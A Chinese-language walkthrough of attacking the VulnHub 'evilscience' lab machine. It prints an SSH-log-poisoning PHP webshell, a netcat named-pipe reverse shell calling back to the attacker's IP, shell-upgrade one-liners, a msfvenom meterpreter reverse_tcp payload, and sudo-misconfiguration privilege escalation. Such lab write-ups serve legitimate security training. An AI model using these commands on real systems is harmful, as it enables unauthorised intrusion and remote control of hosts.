一、靶机下载
下载链接:download.vulnhub.com/theether/th…
二、evilscience靶机搭建
将下载好的靶机环境,用VMware导入即可使用,文件->打开
成功导入虚拟机之后,打开即可
三、攻击过程
kali IP:192.168.212.6
靶机IP:192.168.212.12
1、主机发现
2、端口扫描
方法一:
方法二:
3、端口服务识别
4、漏洞查找与利用
访问目标网站
目录扫描
没有发现有用信息
查看网页发现http://192.168.10.195/index.php?file=about.php 测试存在本地文件包含
为了直观的看到测试结果,这里使用Burpsuite处理http请求。
通过尝试包含Linux系统的配置文件,发现存在一定的限制。
如:包含/etc/passwd发现没有结果。
之后测试了几个常见的Apache日志的路径:
/var/log/apache/access.log/var/log/apache2/access.log/var/www/logs/access.log/var/log/access.log
均无结果。
猜测可能是更改了配置文件的路径,尝试读Apache2的配置文件,/etc/apache2/apache2.conf,发现也是失败。
尝试通过php伪协议读取php文件源码,也无果。
file=php://filter/convert.base64-encode/resource=index.php
结合之前信息探测的结果,靶机只开通了http与ssh服务。Apache的日志包含失败,尝试包含ssh的登陆日志。
成功读到ssh的登陆日志。
获取shell
获取一句话Webshell
使用一句话作为用户名登陆靶机的ssh。ssh ‘<?php system($_GET['w']);?>’@192.168.212.12
SSH的日志会记录此次登陆行为,这样就可以把一句话写入ssh的日志文件。测试一下是否成功:
测试phpinfo
成功写入并执行
可以看到一句话已经成功写入。
mknod backpipe p && nc 测试机IP 监听端口 0<backpipe | /bin/bash 1>backpipe
url编码后:
mknod+backpipe+p+%26%26+nc+测试机IP+监听端口+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe
mknod+backpipe+p+%26%26+nc+192.168.212.6+6666+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe
kali打开监听
提权一
然后用python -c ‘import pty;pty.spawn("/bin/bash")’ 重新打开一个终端
上图看到用python -c 打开的一个终端还是受限的,需要在用 awk ‘BEGIN{system("/bin/bash")}’ 重新打开一个终端
Sudo -l查看是否属于sudo组
可以使用sudo权限不需要密码执行xxxlogauditorxxx.py,查看一下该文件的权限, 该py文件的配置错误,导致可以直接以root权限执行命令
运行一下该py文件,发现是审计日志的程序。 查看Apache2的日志文件,发现是执行了cat命令,但是因为权限不够,没有执行成功。
msfvenom生成一个payload,上传到目标,增加执行权限
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=8888 -f elf > shell.elf
靶机下载shell.elf
sudo运行该脚本
Metasploit 设置监听 use exploit/multi/handler
提权二
首先给/etc/sudoers加写入权限
然后把当前用户以不用密码的登录方式添加到sudo组
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
